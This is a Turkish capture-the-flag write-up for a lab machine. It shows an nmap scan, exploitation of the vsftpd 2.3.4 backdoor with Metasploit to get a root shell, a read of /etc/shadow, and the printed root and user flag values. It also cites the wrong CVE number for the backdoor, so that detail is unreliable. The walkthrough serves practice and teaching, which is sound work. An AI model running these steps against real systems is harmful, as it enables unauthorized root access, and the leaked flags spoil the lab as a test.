PriviaHub White Rose CTF
PriviaHub White Rose CTF
PriviaHub’ın White Rose adlı makinesinin çözümünü sizlere anlatmak isterim.
İlk olarak vpn ile sanal ağa katılın. Makine’nin sayfasından ihtiyacınız olan IP adresini alın ve makine ile bağlantınızın olup olmadığını kontrol etmek için pingleyin. Bağlantınız varsa hadi başlayalım :D
Bilgi Toplama
Öncelikle nmap ile makineyi tarıyoruz:
root@kali:~# nmap -sV -p- 172.16.1.58
Sonuçlar;
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 10:57 MSK
Stats: 0:02:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.34% done; ETC: 11:04 (0:04:02 remaining)
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 66.78% done; ETC: 11:04 (0:02:18 remaining)
Stats: 0:05:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 84.00% done; ETC: 11:04 (0:01:09 remaining)
Stats: 0:06:52 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.77% done; ETC: 11:05 (0:00:42 remaining)
Nmap scan report for 172.16.1.58
Host is up (0.032s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 482.52 seconds
Bu çıktıya göre makinede görünen 3 adet açık port var (80HTTP, 22SSH, 21FTP).
HTTP – Web Sayfasının İncelenmesi
Makinenin 80.portuna bağlandığımızda bizi bir sayfa karşılıyor. Ama herhangi bir işimize
yarayacak bir bilgi bulamadığım için portlardan gitmeyi tercih ettim.
SSH ve FTP İncelenmesi
Burada ise ilk olarak SSH elemek istedim çünkü elimizde herhangi bir kullanıcı adı vs olmadı
için FTP yönelmeyi tercih ettim. İlk olarak 21 porta çalışan ftp servisinin versiyon bilgisi ile
(vsftpd 2.3.4) googel küçük bir arama ile 2011 yılında çıkan CVE – 2011-0862 adında bir
CVE kaydını buldum ve RAPID7 adlı siteden exploit kulanım bilgilerinin alarak saldırı
aşamasına geçtim.
Saldırı
Bu aşamada ilk olarak msfconsolu çalıştırarak komut olarak search vsftpd 2.3.4 yazdığım
zaman RAPID7 deki bilgiler ile aynı olan modül karşıma çıktı ve modülü use komutu ile
seçerek işlemlerime devam ettim.
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4
Devamında ise seçtiğim modülü Show options komutu ile listeleyerek bilgi girilmesi gereken
alanları baktım. Ve set RHOSTS ile sadece hedef ip girerek kaydettim.
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.1.58 yes The target host(s), range CIDR identifier, or hosts file
with syntax 'file:'
RPORT 21 yes The target port (TCP)
Devamında ise kontrol ettikten sonra run komutu ile çalıştırdım. Ve sistem exploit edildi ve
root düzeyinde erişim elde ettik.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 172.16.1.58:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.16.1.58:21 - USER: 331 Please specify the password.
[+] 172.16.1.58:21 - Backdoor service has been spawned, handling...
[+] 172.16.1.58:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 4 opened (0.0.0.0:0 -> 172.16.1.58:6200) at 2021-05-21 11:48:11
+0300
id
uid=0(root) gid=0(root) groups=0(root)
Bu aşamadan sonra ilk root bayrağını ve sonrasında etc/shadow inceleyerek adı ollie olan
kullanıcıyı tespit ettim ve kullanıcının home dizinine giderek user bayrağına ulaştım ve tüm
bayrakları toplayarak sistemden ayrıldım.
(root flag!!!)
privflag.txt
cat privflag.txt
9aeb1a59927458df21ac54e02115fa56
----------------------------------------------------------------------------------------------
(ollie user flag!!!)
ollie
cd ollie
ls
non-privflag.txt
cat non-privflag.txt
9c891a5d82d458df21ab54e02115af78
Yorumlar
Yorum Gönder